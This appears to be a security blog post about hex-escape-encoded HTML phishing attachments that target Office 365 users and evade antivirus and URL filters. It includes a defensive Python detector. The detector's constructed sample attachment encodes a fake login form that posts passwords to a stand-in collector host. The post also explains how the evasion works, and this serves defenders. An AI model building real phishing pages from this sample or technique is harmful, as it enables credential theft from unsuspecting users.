Hex Escape Characters Phishing Attack on Office 365

By | September 4, 2017

In the last few days many customers have been complaining about a new phishing attack against Office 365 users called “Hexadecimal Escape Characters”. The attack arrives as an HTML attachment containing a JavaScript snippet whose content is encoded with hexadecimal escape characters, so no links are visible in the file; when it is opened, it presents a locally generated phishing page with login instructions.

Here’s one example that we’ve seen in several instances: a fake ebay.com email that, when rendered, displays a forged Ebay login.

How it works

You receive a message, let’s say from Ebay, and click on what looks like a link but is actually a local file. The ‘link’ (the attachment) then opens the Ebay login page you would have expected. Sophisticated users would notice that the address bar starts with ‘file’ and not ‘https’, but many won’t. Once you enter your credentials, the submit button sends them to the attackers. The page and its form are rendered locally, so nothing is sent or received until you click ‘submit’.

How the attack gets past your security

There are several factors in this attack that make it unique, allowing it to bypass most security tools, including Exchange Online default security.

– Scanning this file with most antivirus products, and emulating it in a number of them, failed to identify it as malicious. This is because it has no known signature and no active content (macros etc.). It also has no apparent links; those are obscured and not easy to extract.

– Security tools don’t consider an HTML file with a form and a submit button to be malicious; it is not treated as ‘active’ code. As a result, the attachment is not flagged as malicious when scanned.

– The fake “login” screen is local. Firewalls or browser plugins that rely on URL reputation for IPs and domains are completely blind to this, because the page is not fetched from the internet; it is local. The same applies to any DNS-based security, like OpenDNS from Cisco and similar tools.
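A defender-side check for this pattern, added here as an example and not code from the original post: it decodes the JavaScript hexadecimal escape characters in an HTML attachment and reports the form target and password field that only become visible after decoding. The sample attachment and the collector.example URL are constructed for illustration.

```python
import re
from html.parser import HTMLParser

# JavaScript hexadecimal (\xHH) and unicode (\uHHHH) escape sequences.
HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})|\\u([0-9a-fA-F]{4})")
URL = re.compile(r"https?://[^\s\"'<>]+")


def decode_hex_escapes(text):
    """Turn \\x3c\\x66... back into the characters it hides; other text is kept."""
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), text)


class FormCollector(HTMLParser):
    """Records <form action=...> targets and whether a password field exists."""
    def __init__(self):
        super().__init__()
        self.actions, self.password_field = [], False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form" and a.get("action"):
            self.actions.append(a["action"])
        if tag == "input" and (a.get("type") or "").lower() == "password":
            self.password_field = True


def analyze_html_attachment(html):
    """Report what the attachment renders once its escape characters are decoded."""
    visible_urls = set(URL.findall(html))          # what a naive link extractor sees
    decoded = decode_hex_escapes(html)
    # Markup written by document.write() is what the browser renders, so the
    # <script> wrapper is dropped and the decoded string is parsed as HTML.
    parser = FormCollector()
    parser.feed(re.sub(r"</?script[^>]*>", "", decoded, flags=re.I))
    hidden_urls = sorted(set(URL.findall(decoded)) - visible_urls)
    return {
        "hidden_urls": hidden_urls,                # targets absent from the raw file
        "form_actions": parser.actions,
        "password_field": parser.password_field,
        # credential form whose target only appears after decoding: the pattern above
        "suspicious": parser.password_field and bool(hidden_urls),
    }


def hex_escape(s):
    """Encode every character as \\xHH (used only to build the constructed sample)."""
    return "".join("\\x%02x" % ord(c) for c in s)


# Constructed sample attachment, not a real campaign artifact.
FORM = ('<form action="https://collector.example/login" method="post">'
        '<input type="password" name="pass"><input type="submit"></form>')
SAMPLE_ATTACHMENT = ('<html><body><script>document.write("'
                     + hex_escape(FORM) + '");</script></body></html>')

if __name__ == "__main__":
    print(analyze_html_attachment(SAMPLE_ATTACHMENT))
```

On the sample the raw file contains no URL at all, while the decoded form posts credentials to collector.example, which is exactly what reputation-based filters never get to see.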

What can you do?
For now the best way is to use Office ATP (Advanced Threat Protection).
Office ATP can scan the attachment, recognize the malicious URL, and prevent users from browsing to those URLs.
